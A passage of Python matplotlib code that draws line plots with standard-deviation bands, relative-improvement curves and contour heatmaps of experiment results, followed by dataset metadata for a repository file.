# fig, axs = plt.subplots(1, 2, figsize=(14,7))
if figure_size is None:
fig, axs = plt.subplots(1, 2, figsize=(12, 6))
else:
fig, axs = plt.subplots(1, 2, figsize=figure_size)
# fig, axs = plt.subplots(1, 2, figsize=(10,5))
if linestyle_type is None:
linestyle_type = ["-"] * len(list_data_left)
for i in range(len(list_data_left)):
mean = np.mean(list_data_left[i], axis=1)
std_dev = np.std(list_data_left[i], axis=1)
if list_legend != []:
if log_x and log_y:
axs[0].loglog(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if log_x and not log_y:
axs[0].semilogx(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if not log_x and log_y:
axs[0].semilogy(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if not log_x and not log_y:
axs[0].plot(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if fill_between_lines:
axs[0].fill_between(
x_axis, mean - std_dev, mean + std_dev, color=colors[i], alpha=0.2
)
else:
if log_x and log_y:
axs[0].loglog(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
)
if log_x and not log_y:
axs[0].semilogx(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
)
if not log_x and log_y:
axs[0].semilogy(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
)
if not log_x and not log_y:
axs[0].plot(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
)
if fill_between_lines:
axs[0].fill_between(
x_axis, mean - std_dev, mean + std_dev, color=colors[i], alpha=0.2
)
for i in range(len(list_data_right)):
mean = np.mean(list_data_right[i], axis=1)
std_dev = np.std(list_data_right[i], axis=1)
if list_legend != []:
if log_x and log_y:
axs[1].loglog(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if log_x and not log_y:
axs[1].semilogx(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if not log_x and log_y:
axs[1].semilogy(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if not log_x and not log_y:
axs[1].plot(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if fill_between_lines:
axs[1].fill_between(
x_axis, mean - std_dev, mean + std_dev, color=colors[i], alpha=0.2
)
else:
if log_x and log_y:
axs[1].loglog(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
)
if log_x and not log_y:
axs[1].semilogx(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
)
if not log_x and log_y:
axs[1].semilogy(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
)
if not log_x and not log_y:
axs[1].plot(
x_axis,
mean,
colors[i],
marker=markers[i],
markersize=size_marker,
linewidth=2.0,
)
if fill_between_lines:
axs[1].fill_between(
x_axis, mean - std_dev, mean + std_dev, color=colors[i], alpha=0.2
)
for ax in axs.flat:
if x_label == "":
ax.set(ylabel=y_label, fontsize=25)
else:
ax.set(xlabel=x_label, ylabel=y_label)
# Hide x labels and tick labels for top plots and y ticks for right plots.
for ax in axs.flat:
ax.label_outer()
if title_left != "" and title_right != "":
axs[0].set_title(title_left, fontsize=font_size_title)
axs[1].set_title(title_right, fontsize=font_size_title)
# plt.ylabel(y_label, fontsize=fontsize)
# plt.xlabel(x_label, fontsize=fontsize)
if list_legend != []:
if legend_location is not None:
plt.legend(fontsize=fontsize_legend, loc=legend_location)
else:
if outside_legend:
# handles, labels = axs[1].get_legend_handles_labels()
# fig.legend(handles, labels, bbox_to_anchor=(0.85, 1.05))
plt.legend(
fontsize=fontsize_legend, loc="center left", bbox_to_anchor=(1, 0.5)
)
else:
plt.legend(fontsize=fontsize_legend)
plt.tight_layout()
# axs[0].set_yscale('log')
# axs[1].set_yscale('log')
axs[0].grid(True, which="both")
axs[1].grid(True, which="both")
if save_figure is None:
plt.show()
else:
if ".pdf" in save_figure:
plt.savefig(save_figure, bbox_inches="tight")
if ".png" in save_figure:
plt.savefig(save_figure, dpi=600, format="png", bbox_inches="tight")
# plt.savefig(save_figure)
plt.close()
def plot_stochastic_improvement(
x_axis,
reference_data,
list_data,
list_legend,
title,
x_label,
y_label,
colors,
markers,
log_x=True,
log_y=True,
save_figure=None,
legend_location=None,
outside_legend=False,
):
plt.rcParams.update({"font.size": 19})
plt.figure(figsize=(cm_to_inch(12), cm_to_inch(14)))
size_marker = 10
mean_reference = np.mean(reference_data, axis=1)
for i in range(len(list_data)):
mean = np.mean(list_data[i], axis=1)
if list_legend != []:
if log_x and log_y:
plt.loglog(
x_axis,
np.divide(mean, mean_reference),
colors[i],
marker=markers[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if log_x and not log_y:
plt.semilogx(
x_axis,
np.divide(mean, mean_reference),
colors[i],
marker=markers[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if not log_x and log_y:
plt.semilogy(
x_axis,
np.divide(mean, mean_reference),
colors[i],
marker=markers[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if not log_x and not log_y:
plt.plot(
x_axis,
np.divide(mean, mean_reference),
colors[i],
marker=markers[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
else:
if log_x and log_y:
plt.loglog(
x_axis,
np.divide(mean, mean_reference),
colors[i],
marker=markers[i],
markersize=size_marker,
linewidth=2.0,
)
if log_x and not log_y:
plt.semilogx(
x_axis,
np.divide(mean, mean_reference),
colors[i],
marker=markers[i],
markersize=size_marker,
linewidth=2.0,
)
if not log_x and log_y:
plt.semilogy(
x_axis,
np.divide(mean, mean_reference),
colors[i],
marker=markers[i],
markersize=size_marker,
linewidth=2.0,
)
if not log_x and not log_y:
plt.plot(
x_axis,
np.divide(mean, mean_reference),
colors[i],
marker=markers[i],
markersize=size_marker,
linewidth=2.0,
)
plt.title(title, fontsize=fontsize)
plt.ylabel(y_label, fontsize=fontsize)
plt.xlabel(x_label, fontsize=fontsize)
if list_legend != []:
if legend_location is not None:
plt.legend(fontsize=fontsize_legend, loc=legend_location)
else:
if outside_legend:
plt.legend(
fontsize=fontsize_legend, loc="center left", bbox_to_anchor=(1, 0.5)
)
else:
plt.legend(fontsize=fontsize_legend)
plt.tight_layout()
plt.grid(True, which="both")
if save_figure is None:
plt.show()
else:
plt.savefig(save_figure, bbox_inches="tight")
# plt.savefig(save_figure)
plt.close()
def plot_heatmaps(
x_axis,
y_axis,
list_data,
list_legend,
title,
labels,
log_x=True,
log_z=True,
log_y=False,
save_figure=None,
label_heatmap="Error (decimal log)",
color_min=None,
color_max=None,
minimum_values=None,
):
interpolation_method = "cubic"
plt.rcParams.update({"font.size": 19})
title_font_size = 19
ylabel_font_size = 15
colormap = mpl.cm.viridis
# plt.xkcd()
if log_x:
x = np.log10(x_axis.flatten())
else:
x = x_axis.flatten()
if log_y:
y = np.log10(y_axis.flatten())
else:
y = y_axis.flatten()
# define grid.
xi = np.linspace(np.min(x), np.max(x), 100)
yi = np.linspace(np.min(y), np.max(y), 100)
dict_parameters = {"fontsize": 20}
if len(list_data) == 1:
if log_z:
z_1 = np.log10(list_data[0].flatten())
else:
z_1 = list_data[0].flatten()
zi_1 = griddata(
(x, y), z_1, (xi[None, :], yi[:, None]), method=interpolation_method
)
min_val = np.min(zi_1)
max_val = np.max(zi_1)
fig, axs = plt.subplots(1, 1)
fig.suptitle(title)
axs.contour(
xi, yi, zi_1, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax1 = axs.contourf(xi, yi, zi_1, 15, cmap=colormap, vmin=min_val, vmax=max_val)
axs.set_title(list_legend[0], fontdict=dict_parameters, position=(0.5, 0.6))
axs.xaxis.set_visible(False)
axs.set_ylabel(labels[1], fontsize=fontsize)
fig.subplots_adjust(
bottom=0.1, top=0.9, left=0.1, right=0.8, wspace=0.02, hspace=0.05
)
cb_ax = fig.add_axes([0.83, 0.1, 0.02, 0.8])
cmap = colormap
norm = mpl.colors.Normalize(vmin=min_val, vmax=max_val)
cbar = fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax=cb_ax)
cbar.ax.set_ylabel("# of contacts", rotation=270)
if len(list_data) == 2:
if log_z:
z_1 = np.log10(list_data[0].flatten())
z_2 = np.log10(list_data[1].flatten())
else:
z_1 = list_data[0].flatten()
z_2 = list_data[1].flatten()
zi_1 = griddata(
(x, y), z_1, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_2 = griddata(
(x, y), z_2, (xi[None, :], yi[:, None]), method=interpolation_method
)
min_val = min(np.min(zi_1), np.min(zi_2))
max_val = max(np.max(zi_1), np.max(zi_2))
fig, axs = plt.subplots(1, 2)
fig.suptitle(title)
axs[0].contour(
xi, yi, zi_1, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax1 = axs[0].contourf(
xi, yi, zi_1, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[0].text(
0.5,
0.8,
list_legend[0],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[0].transAxes,
)
axs[0].set_xlabel(labels[0], fontsize=fontsize)
axs[0].set_ylabel(labels[1], fontsize=fontsize)
axs[1].contour(
xi, yi, zi_2, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax2 = axs[1].contourf(
xi, yi, zi_2, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[1].text(
0.5,
0.8,
list_legend[1],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[1].transAxes,
)
axs[1].yaxis.set_visible(False)
axs[1].set_xlabel(labels[0], fontsize=fontsize)
cb_ax = fig.add_axes()
cmap = colormap
norm = mpl.colors.Normalize(vmin=min_val, vmax=max_val)
fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax=cb_ax)
cbar.ax.get_yaxis().labelpad = 15
cbar.ax.set_ylabel(label_heatmap, rotation=270)
if len(list_data) == 3:
if log_z:
z_1 = np.log10(list_data[0].flatten())
z_2 = np.log10(list_data[1].flatten())
z_3 = np.log10(list_data[2].flatten())
else:
z_1 = list_data[0].flatten()
z_2 = list_data[1].flatten()
z_3 = list_data[2].flatten()
zi_1 = griddata(
(x, y), z_1, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_2 = griddata(
(x, y), z_2, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_3 = griddata(
(x, y), z_3, (xi[None, :], yi[:, None]), method=interpolation_method
)
if color_min is None and color_max is None:
min_val = min(np.min(zi_1), np.min(zi_2), np.min(zi_3))
max_val = max(np.max(zi_1), np.max(zi_2), np.max(zi_3))
else:
min_val = color_min
max_val = color_max
fig, axs = plt.subplots(3, 1, figsize=(5, 10))
fig.suptitle(title, fontsize=title_font_size)
axs[0].contour(
xi, yi, zi_1, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax1 = axs[0].contourf(
xi, yi, zi_1, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[0].text(
0.5,
0.8,
list_legend[0],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[0].transAxes,
)
axs[0].xaxis.set_visible(False)
axs[0].set_ylabel(labels[1], fontsize=ylabel_font_size)
axs[1].contour(
xi, yi, zi_2, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax2 = axs[1].contourf(
xi, yi, zi_2, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[1].text(
0.5,
0.8,
list_legend[1],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[1].transAxes,
)
axs[1].xaxis.set_visible(False)
axs[1].set_ylabel(labels[1], fontsize=ylabel_font_size)
axs[2].contour(
xi, yi, zi_3, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax3 = axs[2].contourf(
xi, yi, zi_3, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[2].text(
0.5,
0.8,
list_legend[2],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[2].transAxes,
)
axs[2].set_ylabel(labels[1], fontsize=ylabel_font_size)
axs[2].set_xlabel(labels[0], fontsize=fontsize)
fig.subplots_adjust(
bottom=0.1, top=0.9, left=0.1, right=0.8, wspace=0.02, hspace=0.05
)
cb_ax = fig.add_axes([0.83, 0.1, 0.02, 0.8])
cmap = colormap
norm = mpl.colors.Normalize(vmin=min_val, vmax=max_val)
cbar = fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax=cb_ax)
cbar.ax.get_yaxis().labelpad = 24
cbar.ax.set_ylabel(label_heatmap, rotation=270, fontsize=fontsize)
if len(list_data) == 4:
if log_z:
z_1 = np.log10(list_data[0].flatten())
z_2 = np.log10(list_data[1].flatten())
z_3 = np.log10(list_data[2].flatten())
z_4 = np.log10(list_data[3].flatten())
else:
z_1 = list_data[0].flatten()
z_2 = list_data[1].flatten()
z_3 = list_data[2].flatten()
z_4 = list_data[3].flatten()
zi_1 = griddata(
(x, y), z_1, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_2 = griddata(
(x, y), z_2, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_3 = griddata(
(x, y), z_3, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_4 = griddata(
(x, y), z_4, (xi[None, :], yi[:, None]), method=interpolation_method
)
min_val = min(np.min(zi_1), np.min(zi_2), np.min(zi_3), np.min(zi_4))
max_val = max(np.max(zi_1), np.max(zi_2), np.max(zi_3), np.max(zi_4))
fig, axs = plt.subplots(2, 2)
fig.suptitle(title)
axs[0, 0].contour(
xi, yi, zi_1, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax1 = axs[0, 0].contourf(
xi, yi, zi_1, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[0, 0].text(
0.5,
0.8,
list_legend[0],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[0, 0].transAxes,
)
axs[0, 0].xaxis.set_visible(False)
axs[0, 0].set_ylabel(labels[1])
axs[0, 1].contour(
xi, yi, zi_2, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax2 = axs[0, 1].contourf(
xi, yi, zi_2, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[0, 1].text(
0.5,
0.8,
list_legend[1],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[0, 1].transAxes,
)
axs[0, 1].xaxis.set_visible(False)
axs[0, 1].yaxis.set_visible(False)
axs[1, 0].contour(
xi, yi, zi_3, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax3 = axs[1, 0].contourf(
xi, yi, zi_3, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[1, 0].text(
0.5,
0.8,
list_legend[2],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[1, 0].transAxes,
)
axs[1, 0].set_ylabel(labels[1], fontsize=fontsize)
axs[1, 0].set_xlabel(labels[0], fontsize=fontsize)
axs[1, 1].contour(
xi, yi, zi_4, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax4 = axs[1, 1].contourf(
xi, yi, zi_4, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[1, 1].text(
0.5,
0.8,
list_legend[3],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[1, 1].transAxes,
)
axs[1, 1].yaxis.set_visible(False)
axs[1, 1].set_xlabel(labels[0], fontsize=fontsize)
fig.subplots_adjust(
bottom=0.1, top=0.9, left=0.1, right=0.8, wspace=0.02, hspace=0.05
)
cb_ax = fig.add_axes([0.83, 0.1, 0.02, 0.8])
cmap = colormap
norm = mpl.colors.Normalize(vmin=min_val, vmax=max_val)
cbar = fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax=cb_ax)
cbar.ax.get_yaxis().labelpad = 15
cbar.ax.set_ylabel(label_heatmap, rotation=270)
if len(list_data) == 6:
dict_parameters = {"fontsize": 14}
if log_z:
z_1 = np.log10(list_data[0].flatten())
z_2 = np.log10(list_data[1].flatten())
z_3 = np.log10(list_data[2].flatten())
z_4 = np.log10(list_data[3].flatten())
z_5 = np.log10(list_data[4].flatten())
z_6 = np.log10(list_data[5].flatten())
else:
z_1 = list_data[0].flatten()
z_2 = list_data[1].flatten()
z_3 = list_data[2].flatten()
z_4 = list_data[3].flatten()
z_5 = list_data[4].flatten()
z_6 = list_data[5].flatten()
zi_1 = griddata(
(x, y), z_1, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_2 = griddata(
(x, y), z_2, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_3 = griddata(
(x, y), z_3, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_4 = griddata(
(x, y), z_4, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_5 = griddata(
(x, y), z_5, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_6 = griddata(
(x, y), z_6, (xi[None, :], yi[:, None]), method=interpolation_method
)
min_val = min(
np.min(zi_1),
np.min(zi_2),
np.min(zi_3),
np.min(zi_4),
np.min(zi_5),
np.min(zi_6),
)
max_val = max(
np.max(zi_1),
np.max(zi_2),
np.max(zi_3),
np.max(zi_4),
np.max(zi_5),
np.max(zi_6),
)
fig, axs = plt.subplots(2, 3)
fig.suptitle(title)
axs[0, 0].contour(
xi, yi, zi_1, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax1 = axs[0, 0].contourf(
xi, yi, zi_1, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[0, 0].set_title(
list_legend[0], fontdict=dict_parameters, position=(0.5, 0.2)
)
axs[0, 0].xaxis.set_visible(False)
axs[0, 0].set_ylabel(labels[1], fontsize=fontsize)
axs[0, 1].contour(
xi, yi, zi_2, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax2 = axs[0, 1].contourf(
xi, yi, zi_2, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[0, 1].set_title(
list_legend[1], fontdict=dict_parameters, position=(0.5, 0.2)
)
axs[0, 1].xaxis.set_visible(False)
axs[0, 1].yaxis.set_visible(False)
axs[0, 2].contour(
xi, yi, zi_3, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax3 = axs[0, 2].contourf(
xi, yi, zi_3, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[0, 2].set_title(
list_legend[2], fontdict=dict_parameters, position=(0.5, 0.2)
)
axs[0, 2].xaxis.set_visible(False)
axs[0, 2].yaxis.set_visible(False)
axs[1, 0].contour(
xi, yi, zi_4, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax4 = axs[1, 0].contourf(
xi, yi, zi_4, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[1, 0].set_title(
list_legend[3], fontdict=dict_parameters, position=(0.5, 0.2)
)
axs[1, 0].set_ylabel(labels[1], fontsize=fontsize)
axs[1, 0].set_xlabel(labels[0], fontsize=fontsize)
axs[1, 1].contour(
xi, yi, zi_5, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax5 = axs[1, 1].contourf(
xi, yi, zi_5, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[1, 1].set_title(
list_legend[4], fontdict=dict_parameters, position=(0.5, 0.2)
)
axs[1, 1].yaxis.set_visible(False)
axs[1, 1].set_xlabel(labels[0], fontsize=fontsize)
axs[1, 2].contour(
xi, yi, zi_6, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax6 = axs[1, 2].contourf(
xi, yi, zi_6, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[1, 2].set_title(
list_legend[5], fontdict=dict_parameters, position=(0.5, 0.2)
)
axs[1, 2].yaxis.set_visible(False)
axs[1, 2].set_xlabel(labels[0], fontsize=fontsize)
fig.subplots_adjust(
bottom=0.1, top=0.9, left=0.1, right=0.8, wspace=0.02, hspace=0.05
)
cb_ax = fig.add_axes([0.83, 0.1, 0.02, 0.8])
cmap = colormap
norm = mpl.colors.Normalize(vmin=min_val, vmax=max_val)
cbar = fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax=cb_ax)
cbar.ax.get_yaxis().labelpad = 15
cbar.ax.set_ylabel(label_heatmap, rotation=270)
if save_figure is None:
plt.show()
else:
plt.savefig(save_figure, format="pdf", bbox_inches="tight")
plt.close()
def plot_heatmaps_small(
x_axis,
y_axis,
list_data,
list_legend,
title,
labels,
log_x=True,
log_z=True,
log_y=False,
save_figure=None,
label_heatmap="Error (decimal log)",
color_min=None,
color_max=None,
minimum_values=None,
):
interpolation_method = "cubic"
plt.rcParams.update({"font.size": 19})
title_font_size = 19
ylabel_font_size = 15
colormap = mpl.cm.viridis
# plt.xkcd()
if log_x:
x = np.log10(x_axis.flatten())
else:
x = x_axis.flatten()
if log_y:
y = np.log10(y_axis.flatten())
else:
y = y_axis.flatten()
# define grid.
xi = np.linspace(np.min(x), np.max(x), 100)
yi = np.linspace(np.min(y), np.max(y), 100)
dict_parameters = {"fontsize": 20}
if len(list_data) == 3:
if log_z:
z_1 = np.log10(list_data[0].flatten())
z_2 = np.log10(list_data[1].flatten())
z_3 = np.log10(list_data[2].flatten())
else:
z_1 = list_data[0].flatten()
z_2 = list_data[1].flatten()
z_3 = list_data[2].flatten()
zi_1 = griddata(
(x, y), z_1, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_2 = griddata(
(x, y), z_2, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_3 = griddata(
(x, y), z_3, (xi[None, :], yi[:, None]), method=interpolation_method
)
if color_min is None and color_max is None:
min_val = min(np.min(zi_1), np.min(zi_2), np.min(zi_3))
max_val = max(np.max(zi_1), np.max(zi_2), np.max(zi_3))
else:
min_val = color_min
max_val = color_max
fig, axs = plt.subplots(3, 1)
# fig, axs = plt.subplots(3, 1,figsize=(5,10))
fig.suptitle(title, fontsize=title_font_size)
axs[0].contour(
xi, yi, zi_1, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax1 = axs[0].contourf(
xi, yi, zi_1, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[0].text(
0.5,
0.8,
list_legend[0],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[0].transAxes,
)
axs[0].xaxis.set_visible(False)
# axs[0].set_ylabel(labels[1], fontsize=ylabel_font_size)
axs[1].contour(
xi, yi, zi_2, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax2 = axs[1].contourf(
xi, yi, zi_2, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[1].text(
0.5,
0.8,
list_legend[1],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[1].transAxes,
)
axs[1].xaxis.set_visible(False)
axs[1].set_ylabel(labels[1], fontsize=ylabel_font_size)
axs[2].contour(
xi, yi, zi_3, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax3 = axs[2].contourf(
xi, yi, zi_3, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[2].text(
0.5,
0.8,
list_legend[2],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[2].transAxes,
)
# axs[2].set_ylabel(labels[1], fontsize=ylabel_font_size)
axs[2].set_xlabel(labels[0], fontsize=fontsize)
fig.subplots_adjust(
bottom=0.1, top=0.9, left=0.1, right=0.8, wspace=0.02, hspace=0.05
)
cb_ax = fig.add_axes([0.83, 0.1, 0.02, 0.8])
cmap = colormap
norm = mpl.colors.Normalize(vmin=min_val, vmax=max_val)
cbar = fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax=cb_ax)
cbar.ax.get_yaxis().labelpad = 24
cbar.ax.set_ylabel(label_heatmap, rotation=270, fontsize=fontsize)
if save_figure is None:
plt.show()
else:
plt.savefig(save_figure, format="pdf", bbox_inches="tight")
plt.close()
def plot_heatmaps_blogpost(
x_axis,
y_axis,
list_data,
list_legend,
title,
labels,
log_x=True,
log_z=True,
log_y=False,
save_figure=None,
label_heatmap="Error (decimal log)",
color_min=None,
color_max=None,
minimum_values=None,
):
plt.xkcd()
interpolation_method = "cubic"
plt.rcParams.update({"font.size": 19})
title_font_size = 19
ylabel_font_size = 15
colormap = mpl.cm.viridis
# plt.xkcd()
if log_x:
x = np.log10(x_axis.flatten())
else:
x = x_axis.flatten()
if log_y:
y = np.log10(y_axis.flatten())
else:
y = y_axis.flatten()
# define grid.
xi = np.linspace(np.min(x), np.max(x), 100)
yi = np.linspace(np.min(y), np.max(y), 100)
dict_parameters = {"fontsize": 20}
if len(list_data) == 3:
if log_z:
z_1 = np.log10(list_data[0].flatten())
z_2 = np.log10(list_data[1].flatten())
z_3 = np.log10(list_data[2].flatten())
else:
z_1 = list_data[0].flatten()
z_2 = list_data[1].flatten()
z_3 = list_data[2].flatten()
zi_1 = griddata(
(x, y), z_1, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_2 = griddata(
(x, y), z_2, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_3 = griddata(
(x, y), z_3, (xi[None, :], yi[:, None]), method=interpolation_method
)
if color_min is None and color_max is None:
min_val = min(np.min(zi_1), np.min(zi_2), np.min(zi_3))
max_val = max(np.max(zi_1), np.max(zi_2), np.max(zi_3))
else:
min_val = color_min
max_val = color_max
fig, axs = plt.subplots(1, 3, figsize=(18, 5))
fig.suptitle(title, fontsize=title_font_size)
axs[0].contour(
xi, yi, zi_1, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax1 = axs[0].contourf(
xi, yi, zi_1, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[0].text(
0.5,
0.8,
list_legend[0],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[0].transAxes,
)
# axs[0].xaxis.set_visible(False)
axs[0].set_ylabel(labels[1], fontsize=ylabel_font_size)
axs[0].set_xticks([-7, -5, -3])
axs[0].set_xlabel(labels[0], fontsize=fontsize)
axs[1].contour(
xi, yi, zi_2, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax2 = axs[1].contourf(
xi, yi, zi_2, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[1].text(
0.5,
0.8,
list_legend[1],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[1].transAxes,
)
# axs[1].xaxis.set_visible(False)
axs[1].set_ylabel(labels[1], fontsize=ylabel_font_size)
axs[1].set_xlabel(labels[0], fontsize=fontsize)
axs[1].set_xticks([-7, -5, -3])
axs[2].contour(
xi, yi, zi_3, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax3 = axs[2].contourf(
xi, yi, zi_3, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[2].text(
0.5,
0.8,
list_legend[2],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[2].transAxes,
)
axs[2].set_ylabel(labels[1], fontsize=ylabel_font_size)
axs[2].set_xlabel(labels[0], fontsize=fontsize)
axs[2].set_xticks([-7, -5, -3])
fig.subplots_adjust(
bottom=0.1, top=0.9, left=0.1, right=0.8, wspace=0.02, hspace=0.05
)
cb_ax = fig.add_axes([0.83, 0.1, 0.02, 0.8])
cmap = colormap
norm = mpl.colors.Normalize(vmin=min_val, vmax=max_val)
cbar = fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax=cb_ax)
cbar.ax.get_yaxis().labelpad = 24
cbar.ax.set_ylabel(label_heatmap, rotation=270, fontsize=fontsize)
# Hide x labels and tick labels for top plots and y ticks for right plots.
for ax in axs.flat:
ax.label_outer()
if save_figure is None:
plt.show()
else:
plt.savefig(save_figure, format="png", bbox_inches="tight")
plt.close()
| 34
| 88
| 0.512508
| 6,368
| 51,408
| 3.938285
| 0.046639
| 0.022329
| 0.020336
| 0.02847
| 0.919096
| 0.883089
| 0.869253
| 0.854021
| 0.830735
| 0.794091
| 0
| 0.03757
| 0.36471
| 51,408
| 1,511
| 89
| 34.022502
| 0.730335
| 0.025366
| 0
| 0.704626
| 0
| 0
| 0.03949
| 0.014961
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006406
| false
| 0
| 0.005694
| 0.000712
| 0.014235
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
93ca6ead3e3c6f8a4854664e81a2a6df24893921
| 6,412
|
py
|
Python
|
program/KuhnTrainer.py
|
Artemys24/IAPoker
|
34eee1b2c251ff825f1e36758212b6bb46bb513b
|
[
"MIT"
] | 9
|
